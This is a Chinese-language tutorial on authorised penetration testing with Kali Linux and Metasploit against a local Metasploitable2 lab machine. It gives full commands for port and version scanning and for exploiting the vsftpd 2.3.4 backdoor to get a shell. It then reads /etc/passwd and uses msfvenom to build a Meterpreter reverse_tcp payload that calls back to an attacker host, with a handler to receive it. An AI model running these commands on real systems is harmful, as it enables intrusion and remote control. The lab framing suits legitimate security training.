答案:在合法授权下使用Kali Linux与Metasploit进行渗透测试需确保书面授权、封闭环境及不触碰生产系统;首先启动msfconsole并初始化数据库,利用端口扫描和服务识别模块探测目标192.168.1.100,发现vsftpd 2.3.4漏洞后使用exploit/unix/ftp/vsftpd_234_backdoor获取shell会话,通过sessions命令管理交互;在授权范围内执行whoami、ip addr等命令收集非敏感信息,必要时用msfvenom生成reverse_tcp后门并设置handler维持连接;测试结束后记录过程并清理痕迹,强调安全责任重于工具本身。
在合法授权的渗透测试中,Kali Linux 搭配 Metasploit 是非常强大的组合。关键在于确保所有操作都在合规范围内进行,比如拥有书面授权、在封闭实验环境中测试、不触碰生产系统。下面介绍如何安全、合法地使用 Metasploit 进行漏洞评估。
启动 Metasploit 并初始化环境
Metasploit 在 Kali Linux 中默认已安装,可通过命令行启动:
sudo msfconsole
首次运行时会自动配置数据库,用于存储主机、漏洞和会话信息。若遇到数据库连接问题,可手动启动:
- sudo systemctl start postgresql
- sudo msfdb init
进入控制台后,你会看到 msf6 > 提示符,表示环境已就绪。
选择目标并开展扫描探测
假设你正在测试一台本地搭建的靶机(如 Metasploitable2),IP 为 192.168.1.100。先确认网络连通性:
ping 192.168.1.100
使用内置扫描模块识别开放服务:
- use auxiliary/scanner/portscan/tcp
- set RHOSTS 192.168.1.100
- run
发现端口后,进一步识别服务版本,例如对 21 端口的 FTP 服务:
- use auxiliary/scanner/ftp/ftp_version
- set RHOSTS 192.168.1.100
- run
利用漏洞获取访问权限
假设扫描发现目标运行着可利用的 vsftpd 2.3.4(存在后门漏洞):
- search vsftpd
- use exploit/unix/ftp/vsftpd_234_backdoor
- set RHOSTS 192.168.1.100
- exploit
如果成功,将返回一个 shell 会话。可通过 sessions -l 查看当前会话,并用 sessions -i 1 切换交互模式。
维持访问与信息收集(仅限授权范围)
获得基础 shell 后,可执行有限的信息收集,例如:
- whoami — 查看当前权限
- ip addr — 查看网络配置
- cat /etc/passwd — 获取用户列表(非敏感数据)
若需更稳定连接,可生成持久化 payload,但必须确保不扩散到其他设备。例如使用 msfvenom 创建反弹 shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf > shell.elf
然后在目标上执行该程序,并在 Metasploit 中设置 handler 接收连接。
基本上就这些。只要环境可控、目标明确、行为透明,Metasploit 就是学习防御技术的有力工具。每次测试结束后记得记录过程,并清理临时文件和会话。安全的核心不是工具,而是责任。
